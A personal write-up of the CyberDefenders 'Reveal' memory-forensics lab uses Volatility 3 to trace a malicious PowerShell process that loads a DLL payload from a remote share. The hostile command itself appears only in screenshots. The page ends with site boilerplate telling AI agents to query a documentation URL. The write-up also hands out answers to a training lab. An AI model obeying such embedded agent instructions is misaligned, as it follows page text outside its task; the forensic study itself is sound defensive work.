# Reveal Lab

First Of All to Answer This Endpoint Forensics Machine We looking for The Ps-List to determine what happened here BTW so after installing Volatility 3 From this Repository \
<https://github.com/volatilityfoundation/volatility3>\
I use "-f " Paremeter and after that  i give it the location of the file and use "windows.pstree" to determine the Ps-list and export it and there is the full command&#x20;

<figure><img src="/files/uj9FxozdIAq2P8WTazpq" alt=""><figcaption></figcaption></figure>

```bash
python3 vol.py -f /home/kimo/Desktop/192-Reveal.dmp windows.pstree > /home/kimo/Desktop/Reveal.txt
```

## 1- To identify The Malicious Process I dived into the file and here we go from the PPID and the Name of the process i fell it is "4120" the process Id Which Mean it\`s new Process Created and Secondly The most popular script Runner "Powershell.exe" and in the command i found IP and toke it to Virus total to identify it and Simply It\`s Malicious&#x20;

<figure><img src="/files/aPVDRrXsGouUN3g79Wb3" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/BWfnEQSUAh9G6SmDFNk3" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/sGbkRee7aVmIWKursIxY" alt=""><figcaption></figcaption></figure>

## &#x20; 2- In This Question It Simply Asked For the PPID which is determined from the Previous Question

<figure><img src="/files/kexR0gy79JX0VQDzlsDw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ZVk8mmWYz44H9iX6us8Z" alt=""><figcaption></figcaption></figure>

## 3- The Filename Used by the Malware to execute the second payload Still in the same Line and it\`s dll file because we Communicate With Powershell every Small info Will lead you to the important info btw

<figure><img src="/files/nXcVfICXpaPyO7SFKTKi" alt=""><figcaption></figcaption></figure>

## 4- We stillI in the same command and the shared Folder simply it will be after the Ip the Malware communicated With (:

<figure><img src="/files/gsOhW0uMlZWD8AfA2wMe" alt=""><figcaption></figcaption></figure>

## 5- He Want here the Sub Mitre Id So what the Main technique used here it\`s Defense Evasion and after that the sub stage Payload used a dll file to execute so here we go&#x20;

<figure><img src="/files/f0tJM551tdKibFNxS05U" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/sGNeMoI0tUeT9l8liIGH" alt=""><figcaption></figcaption></figure>

## 6- To determine the username i used Volatility again but with User assist plugin and determine the username Easily Uncle Elon was Comprised i think the attacker send him a mail to win iPhone 16 (:

<figure><img src="/files/nteoipKsBdh8hldStVJy" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/cLTdPW9R9K2DhPzgTb80" alt=""><figcaption></figcaption></figure>

## 7- Here I used Threat Fox to determine the name&#x20;

<figure><img src="/files/2WQZ7OcOFk8iiijSUjPt" alt=""><figcaption></figcaption></figure>

> Thanks for reading (:


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://karim-ashraf.gitbook.io/karim_ashraf_space/writeups/cyberdefenders-labs/reveal-lab.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.